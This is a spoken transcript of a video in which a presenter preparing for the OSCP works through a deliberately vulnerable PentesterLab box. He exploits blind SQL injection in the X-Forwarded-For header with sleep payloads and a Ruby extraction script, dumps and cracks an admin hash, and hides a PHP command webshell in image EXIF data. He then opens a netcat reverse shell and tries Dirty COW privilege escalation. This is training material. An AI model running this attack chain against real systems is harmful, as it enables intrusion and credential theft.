Hey everyone, welcome back to another OSCP Journey video. Today we're going to be doing SQL to Shell 2. Spoiler alert, this box has technically been done before by me. I didn't go all the way through. This one is going to be a little bit different than the other two videos for a lot of different reasons. SQL to Shell 2 is a blind SQL injection box, which means that when we're trying to SQL inject on this application, it's not going to give us back any error messages or any kind of feedback, and we also can't display output onto the page or in a response like you would in a conventional SQL injection that is not blind. Blind SQL injections are actually far more common in the wild, at least in my experience. Usually a non-blind injection comes from either terrible error handling or error permissionings in your configurations, or simply putting data into the page straight from like a query, like directly from, without doing any form of sanitization or other referencing. So it really just depends. It's not like a one fix all statement. Just my personal experience, I see blind SQL injection far more commonly in the wild than I do non-blind. That may not be true for other people. I haven't been doing this very long. That's just the way I see it. So I've seen this a lot more often, and I know how this works. Unfortunately, SQL Map is a nice tool in the real world that helps out a lot. Unfortunately, SQL Map is not allowed to be used on the OSCP. So, I said at the start of, I think I said this at the start of the other SQL injection videos, that SQL Map has been a really big crutch for me in terms of SQL injection. I'm really good at finding SQL injections without it, but exploiting them and doing, especially blind SQL injections. Non-blind, I'm fine, but blind SQL injections especially, I really rely on as a crutch. So this machine was a really tough one, and I say was a really tough one because I actually tried to record this video a couple weeks ago. That's why it's been a couple week delay. I wanted to put it down and retry again later. I tried to do it completely blind and just found myself getting stuck because this particular box is really obscure. If you're not familiar with some of the more common places that you'd want to enumerate a blind SQL injection for, and unfortunately I wasn't, so I actually learned a lot. So unlike the other two SQL injection machines, the only difference between those two were the back end that was running. So one had MySQL and one had Postgres. Otherwise, the vulnerability in the web application was the same. As you'll see, the vulnerability in this web application is not the same, and it's something that's going to be really obscure that we'll walk through. So I've already done this box up to the point of discovering the SQL injection, but I did not finish executing or exploiting the SQL injection due to pretty much just being stupid or not intelligent enough to figure out the best way to formulate a script for enumerating the blind SQL injection without using SQL Map. So that's why I had to kind of put it down and read through the actual course for this box rather than doing it completely blind. And I also haven't fully exploited and gone root. I assume the root process will be the same for this machine. On the SQL or on the Pentester Labs website, they don't really go into too much detail about that. I think it's the same across the board for these three boxes, but that is something we will find out today because I have not done that yet. Alright, so enough of me talking. I'm going to kind of show you guys how I went about going through the box, and then I'm going to share with you guys the script that Pentester Labs provides. It's already in the article. I'm not really sharing it with you. I'm just showing you what we're using, how it works and why it works, and how useful this might be on the OSCP, just given that you change a few values. The script, it's basically a script that will go ahead and query and enumerate for you if you want to use it to help you with your blind SQL injection on something like the OSCP or another certification exam. It could be very useful potentially. I haven't looked into it that deeply, but that's something we're going to do today. So we're doing all those kind of things, plus rooting the box if we can, to kind of make up for my having to kind of cheat. This is one of the few boxes that I will have kind of already figured out beforehand because I really needed to take the opportunity to learn. So unfortunately you guys couldn't watch me grow and learn in that process. But I did learn a lot from this little Pentester Labs course. They have really great free courses of machines, so if you're brand spanking new to this kind of stuff, I highly recommend doing those and walking through them, not trying to get them blind, but actually following the course because it's some awesome material. Alright, so enough talking, let's do it. So we're back at My Awesome Photo Blog, and we know that our good friends at My Awesome Photo Blog have had a terrible reputation for having SQL injection in their applications. Thankfully, it's been a long time, and I don't remember exactly what the SQL injection in this was, so we can play around and see if we can try to trigger it. So we can say or 1 equals 1. I believe that's how we found it the first time. And it's not pulling down any data, or 1 equals 2, maybe a false condition. Yeah, so nothing here. We could try to say or 2 equals 2 semicolon sleep 10 seconds, maybe? Nothing. So it looks like it's also not giving us some SQL error messages back. So they've cleaned up their site a bit. They're not quite as vulnerable as they once were. Kind of remember this page a little bit. So or 2 equals 2. I'm going to change it to an and. So we're not seeing anything fancy like we were before. And the reason that is because these pages aren't vulnerable. They fixed those vulnerabilities. Good job, people at My Awesome Photo Blog. Nice little fictional company. Alright, so what that means is whenever you're doing SQL injection on a site, there's a lot of things you can do. Normally what I do on an actual Pentest is I'll fire up SQL map and I'll point it at the URL and let it hit the ID and see if it can discover anything if I'm not seeing anything from manual enumeration. But we don't have that option today. So we're going to go to Burp Sweep and we're going to look at the headers. So SQL injection can also take place in some of the request headers. Whether it's your user agent string, your host string, and a couple other parameters, it can be a great starting point to get a SQL injection. So we're going to send this to repeater. We're going to turn intercept off. Alright, so we're going to say go, and we hit My Photo Blog, right? So you could check for things in the host header. The host header is going to be great if you want to know like where your host is. So in this case, this is the box that we're trying to request. So the web server could do something with this value and say, hey, if the request is destined for this web server, say you have load balancing or something going on, and it's doing some funky logic based on the host IP. I don't know what it could possibly be doing, but maybe it is. That would be one way to do SQL injection if they were throwing that IP into a table somewhere. I don't know, maybe. The user agent string to me is a little bit more common. Maybe they're storing some statistics in a really weird way on the back end, and they're doing like they want to know who's using what browsers most often. They're hitting their sites, and they have their own back end analytics engine that's poorly written. That could be a potential place to go in. But to save us some time, and this is where I got stuck, it's none of these things. It's going to be the oops, kind of goofed up there. It's going to be none of these things. Instead, it's actually going to be this X-forwarded 4 header. So the X-forwarded 4 header, if we take a closer look at that, Googling around. Oh no, let's turn off Burp. We don't need it anymore. So the X-forwarded 4 header is used to identify the originating IP address of a client connecting to a web server. So this is the opposite of the host header. This is us. This is used to record our IP address. So normally, like I'm coming from 10.10.20.20 or something. I don't know. If they're using that on the back end, like say they want to store or log whose IP address, and maybe they're using like IP-based authentication or IP blocking or something on a web app level, which is stupid. Don't do that. But maybe they are, and they're querying this on the back end against the database or something. That's the value they would check. And I don't know if I'm using that right, or I don't know if it needs a colon or not. So let's see if we can find some examples about how to use this header. Yeah, okay. Yeah, I believe there's also some proxy stuff that has to go into this as well. So this is the header that's actually exploitable by our SQL injection. Because if we do, it's kind of hard to tell. If we say or 1 equals 1, and just do that, we don't really see anything wrong. Well, it's really hard to test for SQL injection in this way. This video is kind of turning into more of a tutorial than anything else, but I'm just trying to explain what I learned in this process. But I kind of already knew this. To really test for blind SQL injection to know if it's working or not, we use the timing-based stuff. I did this in the other non-blind videos just to test what the backend might be. Like I said, if you have, depending on what your SQL database backend is, if it's Postgres or MySQL or T-SQL or MS SQL Server or whatever, each of those SQL languages, or each of those database backends, not the SQL languages, each of those database backends implement a different structure or function for doing time delays. So like MySQL does sleep, Postgres does like Postgres sleep or something like that. I don't remember what we did in the last video. And then I believe SQL Server is going to be like time delay and some values. So that's the best way for blind SQL injection to test if you're actually getting a valid SQL injection or not, is to just do a sleep. And that is because since you're not getting output to validate it, if you send the sleep function over in your injection and it executes and you delay it for 10 seconds, 8 seconds, whatever, and your page doesn't come back for 8 seconds, well, there's a chance that your SQL injection works. So that's a way you can test for blind SQL injection. So let's do that here. Or 1 equals 1, sleep for like 8 seconds or something. I'm not sure if this is going to work or not. Didn't seem like it did. So we're going to cheat just a little bit and go to our documentation here, because I don't remember what the specific thing was they had here. So they were doing an or sleep 0 and 1 equals 1. Okay, so we do an or sleep 8 and 1 equals 1. Lowercase everything. Could be doing this all kinds of wrong. Oh, I see what the issue is. Okay, so the issue here is going to be escaping. So these are just all kinds of things you can enumerate. I'm kind of cheating through this because it's a more complicated one that I didn't figure out. I'm not going to pretend like I solved it and figured it out. When you're doing SQL injections type stuff, try everything. That's going to be the key for me for this on the OSCP, is not to, if I see something like this, is to not give up. Try all the headers, try all the different combinations. Try escaping with a semicolon, tick here, or tick there, or tick there. Just keep trying the different possible things till you get some kind of result, because you never know. So that one in. Neither was that. So they're doing some kind of weird netcat thing. And I don't think that'll matter. I think we need this. Let's do it just like they are. Hacker man. Okay, maybe it was something to do with the IP address. But as you can see, there's a delay in our sleep function. And in just a few seconds, we should get a response. Any day now. There we go. There's our response. It took there's somewhere that says how long that took. Can't see the option here, but whatever. It clearly executed that delay correctly. So we're gonna get off our cheat sheet here. Now the nice folks over at Pentester Labs have written us a super useful script for doing this blind SQL injection so we don't bash our head against the wall. So let's look at that. Alright, so here it is. It's written in Ruby, and you have like an injection string that you have up at the top. I haven't made the final edits to this, so we're going to have to add in some code towards the end, I think, to achieve what we want to achieve, to dump the password. But what it's doing is up here in our test, it is making a connection, doing our SQL injection, and then if that works, I think, let's see, I may be misexplaining this. Alright, so setting this to P, setting this to T, and then we are sending over P. Okay. So this is just doing a test. Why does it take that as value of SQL? Oh, I'm done. Oh, I'm so dumb. I wasn't reading this correctly. Okay. So yeah, this is taking in a parameter of SQL, which is whatever we want. This is our injection. In our case, it'll be this select version, so we're going to get the version on the back end, which we can actually already see, so this is a good verification. We can see in our header our version, I believe, is what's going to get returned. So what this is like a binary search, I believe. Let me not misquote. Let me make sure I'm giving you guys the right information. You can go read this, honestly, but I'm just kind of explaining what I've learned. I already knew this, so it is a binary search, right? Yeah, that's a binary search for for this. Okay, so the way blind SQL injections work, even in SQL map, is it implements some kind of binary search and basically uses truthiness to determine if a value is returned back or not. So this is just a little tidbit of knowledge, and I'll shut up and we'll get to running the script. But it's going to send the SQL injection. We want the version, and it's going to keep sending it with these bit values to test and see, hey, alright, select if this is true. So that's why this is wrapped in an if statement up here. I'm going the wrong way. So that's why, yeah, this is wrapped in an if statement. It says if, select this from this, and iterate through the bits. It'll return something like if the first letter is V, and it returns true, well, now we know the first letter is V. Otherwise, if it's false, we move on to the next one. It kind of does a binary search with that. So that's my long-winded explanation of how that works. I highly suggest just going and reading the course because I'm bad at explaining this. Let's explain it. So Ruby blind RB. So what this is going to do is hopefully print out that version number that we can verify, and then we can actually use it to check out a few more things. So it says it found a 5 dot something. .1. So what's really great about the script is that it could be adapted to other blind SQL injection attacks. Now it's not very fast, but neither is blind SQL injection normally, but it'll get the job done. Like, we're pretty much brute forcing this version number, and it's doing a pretty good job. So when you're going to the OSCP, what you could do is figure out a place where you have SQL injection. Once you've got a valid SQL statement that you have working, you could reference the script and replace the base SQL injection and try to do something similar to do the binary search enumeration for the blind SQL injection. That's what my strategy is about it. Hopefully I won't encounter anything this crazy. This was really tough for me, not having, or it was only really tough because I didn't have, or because it was obscure. If it wasn't quite as obscure, there's tons and tons of resources for blind SQL injection. So it really wasn't that bad. It was just the header that was obscure. So hopefully anything I find on the OSCP won't be that obscure, but otherwise, just gotta try harder. You never know. So, as you can see, 5.1.66, it's starting to print out what looks like squeeze. So, squeeze 15. So this is our PHP version, keep in mind. But this is what we're looking at. So this is supposed to be our SQL version that we're putting out. So 5.1.666 plus squeeze, which is different from our PHP version, I believe. Yeah. So the script ran. There we go. That's what we found. So now let's get something else from this. Let's try to let's change our change it from version to maybe select, I think, user. Tell us what user on. I think this is the example they provide in the document. So try that. See who our user is. And this should be the user that the web app is running as, I believe. Or the user that's running the backend, like the database. I can't remember. Let's select, yeah, since it's selecting a user from the table, it's going to be the user of the database. Cool. It seems to be working. It seems to be finding some stuff. Doing a pretty good job. Alright, while that's running, I'm going to go reference that article again to find whatever that code was that I needed. So, down here it tells us, so it's explaining that there are different configurations we could add to make this easier to read. However, I don't think we're going to need that. I think the only thing we need will be this payload. It's the select cat. We'll see how it does without this, although that may be better. Dump multiple rows, you just need to add into the loop, retrieve one at a time. Okay, yeah, so this is a good idea if we want to dump multiple rows, so we will implement this loop for sure. And look at that, Pentester Lab at localhost is probably what it's going to be. Let it finish out here real quick. Nice little ASCII triangle. Yep, Pentester Lab at local. So let's go back into. What am I doing? RV. Okay, so I think we want to replace our loop here with what we have. Oh no, that's not what I want to do at all. Okay, that's not what I wanted at all. Kind of a vim noob, you guys, so bear with me. so we want to get rid of, whoa, wrong way, dude. What are you doing? There we go. I'm going to get rid of all this, and we want to go to our script here. And we want to make sure we say set paste, because I don't think I've set paste. Yeah, there we go, perfect. Alright, so now this should work, unless I totally screwed that up. Yeah, I think I might have totally screwed that up. Because we want wall value is not equal to 0. Yeah, I did. I didn't need that whole thing copied. I just needed to do the new thing. You know, we'll worry about that later. We don't want to mess up a good thing. So instead, what we'll do is get that query that we want. So we know before that it was from users, and we could probably just get the password, but the backend structure here isn't really any different. So let us paste that and hope for the best. So now that's going to run, and hopefully will give us our password hash. Looks like it's working great so far. So that's should be the same hash as last time. And we may look into this exploitation with SQL map as well, just to play with it and show you how that works. Probably not, though, because I've already wasted enough time on this. It's pretty straightforward. You just specify the X44, and SQL map does the rest. It's really easy. It's even more skid than we're being now. We're already being kind of a script kiddie. So we're going to exit out of that reference blog now that we've done all the hard stuff with the script. And we're just going to let the script run. And then once we've done that, we'll pop a shell, because that's what I'm actually any good at. I'm not really worth a damn otherwise. Alright, so this is going to do that. I guess while we're waiting on this, I'll tell you guys about the other progress I've made. You may, if you're following me on Twitter, you'll see that I haven't been stale or stagnant on training for my OSCP. I've been on Hack the Box. I popped 2 boxes this past weekend. I came back to Poison after being on kind of hiatus from it towards the end of my school semester about a month ago. I had started it. I had gotten a user, got some credentials. I even turned the LFI into an RFI. I kind of want to go back and explore that. Hopefully I'm not saying too much about that box. But I got a bunch of information. I got a local user, and then I was trying to privesc, and I got stuck on the privesc. And then about a week ago, I realized how easy that privesc should be, and I was thinking to myself, all right, well, if it is that easy, then I'll just hop on and do it. And sure enough, I hopped on and did it this past weekend, and it was super fun, super easy, and I feel super happy that I was able to root that. And then shortly after that, I rooted Chatterbox, and that one was a super fun one. Because it was kind of a pseudo DIY buffer overflow. You didn't have to reverse anything, and there was public exploit code, but that was about it. It was still pretty custom, and you had to like download a VM, do the whole buffer overflow thing. I feel like I'm giving a little bit too much away on those, so I'm not going to talk about them any further from that. That information is pretty much publicly available on the forums if you're looking for that. Otherwise, I'm sorry if I spoiled a little bit for you. Hopefully it wasn't too much. But I compromised those 2 machines, and that was super fun. And next up, after this video, I am diving heavily into reverse engineering and binary exploitation challenges, doing like exploit development and stuff like that, all the real good super elite hacker stuff. So that'll be fun. I'm going to pick up my Art of Exploitation book that's sitting on my shelf. I'm going to try to start going through it. I'm going to be watching Live Overflows videos like I've said before. And I'm also going to be doing exploit exercises, such as the Protostar VMs and stuff like that. So that'll be fun. I'll film a couple of those, of course, for the journey. But for the most part, when it comes to my binary exploitation stuff, I'll be kind of in the books, researching and learning a lot, because that's not something I know about. There will be less box hacking. So anytime there's an applicable opportunity to make a video update and show you guys something or walk through something blind, I definitely will. Maybe I'll do like a CTF challenge or something. But otherwise, I may be kind of dark in that regard, not saying much until I've figured that out. That's the next step. Once I've done that, it's just a lot of just general training and hacking more boxes, maybe some pivoting practice, because I will have learned all the base knowledge I need going into the OSCP, and all that's really left to do at that point is doing the course and the exam. So I've done all I can do on my own at that point. But it's going to take me a while to get there. I'm very much a noob when it comes to the binary exploitation stuff, so we'll see how I do. Alright, well, it looks like we got our admin username and our password hash. I actually don't remember what this password hash was. So I'm gonna try to use hashcat. So hashcat example hashes. I'm gonna try to crack it locally just to see if I can. Because last time we popped it into an online thing and gave it to us instantly. So, but this time I want to say hashcat M0 and we'll do, I guess we need to say let's just cut this out. Echo this into hash. Sounds good. Hashcat dash help. So specify a mode. Okay, here. That's a good example. That should be exactly what we need. So hashcat dash a 0 dash m0 hash, and we want to go to user share word list. Good old Rocky, it should be in there, right? You would think. Oh no, Intel CL runtime. I don't have that enabled. Alright, well, looks like we're not doing that. I thought I'd fixed that already. Apparently I had not, so I'm sorry for my hashcat fail. So let's do this. Crack MD5 hash. I'll have to make sure I fix that. I usually don't crack hashes on this machine. It's not very fast or good. Good old captchas. But I should have that for quick stuff like this. Like that would have cracked fairly quickly. Alright, so let's go to my photo blog and log in. So admin, password, and we're back. Hopefully the exploitation here is the same. So if we do, let's make ourselves a quick PHP shell. So if we say shell.php.png, I believe. Could be wrong. Screw up that in a minute. So we'll say PHP. We'll say command equals $_request. Command. So system command. Awesome. And then we will write this. And now we should be able to browse to our shell. Say test, add test, valid content type. Huh, maybe they're doing like actual validation now, not just crappy. So move shell.php to shell.php maybe? So we may have to do another trick here. I've got plenty of tricks up my sleeve though. So, no worries. Only GIF, PNG, or JPEG. Alright, so it looks like it might actually be testing for a valid file type. So if we say move shell.php to shell.php.png, we're going to have to add those magic bytes on the front, I believe, if it's actually doing a file check. So let's say PNG magic bytes. Or we can just say Gary Kessler. Gary Kessler's file signature site is the best. I absolutely love it. So the PNG magic bytes are right here. Should just be able to copy this as is. We'll find out in a second. We'll have to verify this with a hex editor. So what we want to do is paste in from here, escape, write this file, and do an XXD on this to see. Looks like that worked. Oh, maybe not. But what we can do is a file command to verify as well. Nope, that's not good. Alright, so that wasn't exactly what we wanted, and that is okay. What we'll do is actually use a hex editor to insert this. So I believe I have ghex installed. So if we open up this, we can insert some bytes at the front here. We just want to insert these guys on top of everything. So let's say paste. Oh, that's not what I wanted. File. I see what's happened. Okay, we don't want to paste it there. We want to paste like right here. Nope, nope, no. If we gotta manually type it out, we will. It's not that long. So we'll say 89. Oh no. File. Alright, so ghex being weird. There's a fancy way to do this with XXD and DD. I'm just not super familiar. So what we're actually going to do is open up hexed.it. So this is an awesome HTML5 hex editor that I know does exactly what I need it to. So we're going to open our shell. Then we're going to insert bytes here. Or actually, we're just going to insert data at cursor position. Hexadecimal values. Beautiful. Alright, so now we should be able to export this. Save. That's in our downloads now. So let's go get that. Yeah, we'll replace. I'm confident that it worked. I'm gonna eat those words in a minute. So if we say file, looks like a PNG. So our magic bytes trick should have worked. So let's do test. If it actually has to be a valid file, this should work. Invalid image. Well, I didn't expect to encounter this problem. I believe there's a way to do this, like insert as a comment with exif tool. Insert PHP comment exif tool. No thanks. Alright, so let's go find, I believe I have like a profile picture or something of my avatar in my pictures. Yeah, that should be great. I don't know where the screenshot is from. Alright, so we got my in-game profile pic. Hopefully I didn't just copy that out. I wanna keep that in there. Okay, we did just copy. Don't even know what I just did. Alright, so we say exif. First, let's do a test. Let's make sure this image works. I'm not sure why it wouldn't work. Say test. Browse. Yeah. Awesome. So that worked. We don't need that anymore, so we can say that's not what I'm actually familiar with. Let's look at a different one. So that was weird. I don't know. It was similar to what I wanted, but just do this. Exif tool add comment. Googling around different forums. Okay, yeah, so this should be fun. So it should be dash comment. So if we say exif tool dash comments PHP go in-game into in-game profile PG file not found. File not found. Super weird. Oh, okay, I see what's going on. So let's do that. File not found. That's not a file. Oh, I'm such an idiot. Okay. Bad syntax. Alright, so now if we do this. Alright, we got our PHP in there. So now, if we say new picture, yo. Alright, that seemed to work. And so now if we go to, let's open a new tab. Uploads / yo. I'm not sure this would be. Okay, yeah. So, copy image location. .php. Interesting. I'm not sure that that's getting executed. I think I may know what the problem is there. So we need to say rename.php.png because it wasn't getting borked on the extension, it was getting borked on the file. So let's try this. That worked. Copy image location. Huh. Maybe they patched this. Let me just go cheat and make sure that I'm not going down a rabbit hole that is unrecoverable. Because this may have all been patched and it may have just been the point was to do the blind SQL injection. Oh, this is called SQL to shell. So you would think that it would let me in. Huh. It's not doing the echo, but what I did was right. So if let's ignore that and do this the right way. So if we say $_request cmd system cmd, right? Alright, so now if we go in our desperate attempts to get this to work, this should be it, like for sure. So now if we say cmd equals ls-la, that didn't work at all. What did they do? Say strings oh, because it's a valid image. I'm so stupid. Oh, I was trying to do this the totally wrong way. So let's remove all these in-game. Alright, start from there. So, learn something new. So, tool-c, we'll do it their way. I'll say system, just do a get cmd and we'll call this please.php. This dash comment. This dash comment. Yeah, that's why they did this. Oh, I'm goofing up all over the place. All right, let's do this. Let's write our actual shell code here, our dumbass PHP script. So I guess you guys do get to see me struggle a little bit. cmd. Alright. So let's put it all on one line just to not get our panties in a wad. Alright. Right quit. And then we'll say exif tool comment. Do it exactly as they do. Files not found, test.png. Oh, I'm so silly. That should have worked. But you know why the other one wasn't working? It wasn't working because we weren't inserting a file. It was literally just a comment string. There was no way that would have ever worked. Oh my gosh, I can't believe I'm so dumb. Alright. This should work now. Alright. Even when I've got the answer in front of me, I'm over here trying to put my own spin on crap, and of course it's not going to work. Alright, so we say strings in-game grep your system. Oh yeah, okay. It's there. Should work now. Sorry. I failed. Alright, new picture. This time. Alright. So now if we copy image location, and we say cmd equals ls. Right, is that what they did? Probably not. No, okay, I've got to be accessing the actual files. If we say slash call it c.php. See if that works. I don't quite understand why that would work, but it does. This can just be called anything. Let's read this. Okay, that makes sense to me. Alright, so we did an ls. Say which NC any netcat. We can do this. We can say NC start a handler and just see what happens. Fig incat dash lvmp1337. Yeah, how we do. This is our IP on the subnet, and we just say go here on 1337. Get a connection back. We got a connection back. Hell yeah! All right, so let's get a shell back. So let's do this. And bin bash. Awesome! Alright, there's our shell. I feel like I had another terminal open that wasn't crap. Yeah, okay. So, let's kill that. That was probably not wise, but whatever. Alright, let's get our shell. Cat dash LVMP 1337. Get it going. Get a shell. Awesome. Let's, which Python? Okay, that's right. We weren't able to upgrade our TTY on this one. That was okay. So uname -a. This hasn't been updated, so we'll be able to dirty cal this again. Easy peasy. Let's go do that real quick, just to kind of make myself feel better. Alright, so we can say search exploit for dirty cal. I believe it's this one. -x. Yep, that's it. -p. And that was a copy. It's too dirty. C. believe we didn't have access to GCC over here. Is that right? So GCC-H. Absolutely not. So we gotta compile this with 32. So if we say dirty, say cat dirty.c. Oh god, what have I done? No, less dirty.c. Alright. So this is what we want. Let's get it going. But we also want to compile for 32-bit, which I don't remember. I think it's -M32. So we say this. Oh my god. Why did that not do what I wanted? Alright. Compile with this. -M32. Say file dirty. Worked out great. Alright, so this should work because this is a 32-bit Debian machine, a little bit newer, but should have worked. We got it to work before, so now we can say Python -m simple HTTP server on port 80. Simple simple HTTP server. I've done this 1,000 times. Ow. Derp. Alright. Why isn't this working? Server on port 80. Beautiful. Go back to our shell. We'll say wget http 192.168.2.166 dirty. Alright, there it is. Beautiful. Alright, so we want to go ahead and run this with the proper go ahead and give it a new password and let it do its thing. So we say dirty. Let's first make sure we see image mod it. And we'll say /dirty PR. So that'll be our root password for Firefart. And then we'll give it a few minutes. Should root nice and easy. I don't know if this box has a SSH open on it or not. I believe it does. Give that just a minute. Terminal say SSH root at 2.168.2. 2.168.2.2. Yeah. Okay, no SSH enabled. How did we do this before? Got it going with Dirty Cow. That worked great. Did we just sue into root? I don't remember how we did this. I mean, we definitely just owned it. How did I do this? Did we use a different one? Like, did we use the different Dirty Cow exploit that just dropped us into the shell? That might have been the way to go. We might have just goofed that up. So let's do this. Let's examine the different exploits. No, so I want it to drop us into a new shell right away. Although we can probably modify this exploit and just do that ourselves. Wasn't it? Okay, yeah, this looks like what we wanted. Alright, so we'll do this instead. Even though we've already rooted it, we just don't have access because we're dumb. Alright, so I want to say paste. Ah. Let's see. I'll say paste. No. Plus 32.c. Alright, so now should be able to do this. Oh my gosh, why? M32 on this 32. Got some warnings, but screw it, we'll give it a shot anyway, because that's how we do. So we'll say wget, wget hp 2.168.2.186/cal root. Alright, so chmod plus x cal root /cal root. I hope it drops us into a shell. This is supposed to give us some kind of output here, so we'll leave that alone, and we'll take a closer look at this exploit to see what we should expect. So it's supposed to back it up, override it, and pop the root shell and let us know. So that's what we can expect from this, if it works. If we had a TTY, we could just go in, but I don't see an easy way to pop a TTY here. I guess we could try to just run bash, but I don't think that works. So we'll see what this comes back with, if anything. Okay, so that process is still running. I'm glad I just typed to check. I just wanted to validate. Let me make sure I'm not missing anything. Doesn't look like I am. It's just taking its time. paranoid checking. See if the exploit worked. Good way to know things is determining whether or not box crashed. So another thing we can do real quick is start another netcast listener. Have a backup shell. 1338. We can do some playing around while that's waiting. Alright, so okay, back got created. That is a sign of something. Say less 32. Yep, okay, so that's a good sign. Looks like our stuff's running. So this second shell we have will help us a lot. Just to verify. That doesn't look right. But what do I know? Pearls on TTY. Let's try this one for size. Nothing. I really wish I remember how I did this. This is just going, and I have no idea if it's working. Cal root is running. It is appearing to do something. Just kind of blindly following. Do not recommend this. It's taking a good second though. I guess while we're here, we can explore for other ways to potentially prove-esque. Oh. Okay. I didn't know root was just accessible. I don't know if that's anything I did or what. It says it is. We've got at least read, right? That's cute. Yeah, okay. Well, welcome to the root directory. Let's see if we can create a file just to test this permission. So we can add authorized keys. Okay, that's a thing. So let's echo test into authorized keys and cat authorized keys again. Fair enough. Touch maybe. Okay, so we don't have write. Just looks like we have read. Still pretty bad. should be able to read that SSH key. Dutch testing. Nope. Okay, so we don't have full root there. Oh my god, I don't think this is working at all. See if we can like start the service though. Service start service SSH start. No idea. How did I root this before? A dirty cow. I mean, I haven't rooted this particular one, but, you know, the other boxes. This has turned into quite the adventure that I was not expecting. Yeah, according to my reference before, this box just had SSH enabled by default for it. Let's do a test. P22 2. Yeah, it's closed. Okay, so we can't just SSH in like we did before. We have to be creative. And I don't think this is going to particularly work. But you know what we probably could do? Oh, just died there. That's okay. Got that back, we did. Got our 2 shells. What we can do instead is see if we can... dirty cow. See if we can do, just execute a command. Let's see if we can modify what we have. So let's dirty.c. So what it does currently is copy file. No, let's do something different. Let's look at these exploits. Alright, so this explains what's going on. Dirty cow, open read-only file, set file ID, file descriptor fork, process, which child, send value otherwise. Okay, so that just does that. That's not what I want. This one we already looked at. Let's look at this one. This box is getting kind of old. We've already done all the fun, exciting stuff the first time I solved it, so I'm gonna be glad to be done with this. So dirty cow foo. Yeah, I'm not real sure how we'll get root on this without doing some heavy exploit modifying. See, dirty cow is interesting because it doesn't actually execute like a command as root. It does, but it doesn't. So I can't like just, hey, run netcat for me. It's working with files. What I might be able to do is change like the incat binary or the netcat binary to always run as root or something. But I'm trying to decide what I actually want to do. Cow root is still running. I think we'll call it good for this one. we all know it's vulnerable to dirty cow. We've exploited it about twice now. We exploited it even here. I'm just not up for getting a shell. I'm really tired of this box. So that was sequel to shell 2, very poorly addition. I'm definitely going to save this blind Ruby script. That was super important for identifying SQL injection. Or for enumerating the blind SQL injection. That search is already there. That request structure is already there. You just have to modify it. In fact, let's take a look at that again. That's supposed to be, this is going to be our driving point home. So to modify this for something like the OSCP, your payload here, which is your P, is what you would modify. So here we know that originally we found that if we did some series of character ticks, a tick, or an expression, and 1 equals 1 with a end quote missing, that it would do stuff. So then if we add this if conditional with the sleep parameter as well, we know it will work. The sleep is just kind of to give a quick delay, or to give a delay for the query to finish, I believe. So all you have to do is change this payload and insert this if condition where it may go. So if your payload was something like, one and thing equals thing sleep 10 or something, and that's what you found, what you would do then is maybe do an or if this little Ruby syntax, something like that. Might not be exactly right, but hopefully you get the idea. You just modify the payload and it worked. That was really my biggest takeaway from this, because I didn't get much else out of this since it was kind of convoluted. So it's doing that for you, and then the select ASCII substring helps out, and you can modify this if it's not quite working. It's just super helpful that they already have the binary search part written for you. Everything else is easily modifiable, including your injection, what your information you're trying to get. So if you get nothing else out of this video, that should be what you got out of it for how long this is. So thank you so much for watching. I know this video is probably one of the worst videos I've made out of my series, but I've been getting a lot of good comments and feedback from you guys. You guys are enjoying this content, the style of this content, the fact that you get to see me bash my head against the wall and then solve things. It's not really a tutorial. I've said it time and time again in the comments. These aren't tutorials at all, but if you learned something from them as if they were a tutorial, that's great. I'm super happy about that. I really am glad that I'm able to help teach and contribute something, but really, this is just me fumbling around like an idiot, as you can clearly see from this video. So I apologize for this video. I'm going to publish it anyway, just for continuity purposes, to show you guys that I did what I said I was going to do. But my next videos will be a lot better and a lot more interesting because it's all going to be reverse engineering and exploit development type stuff, although it may take me a little longer to publish a new video. I'm almost at 1,000 subscribers, so if you're not subscribed, click subscribe, I guess. That's a really cool thing that people are subscribing and liking these videos. I really appreciate that. So yeah, that's super cool. Hopefully my next video won't be so crappy. Thanks for watching.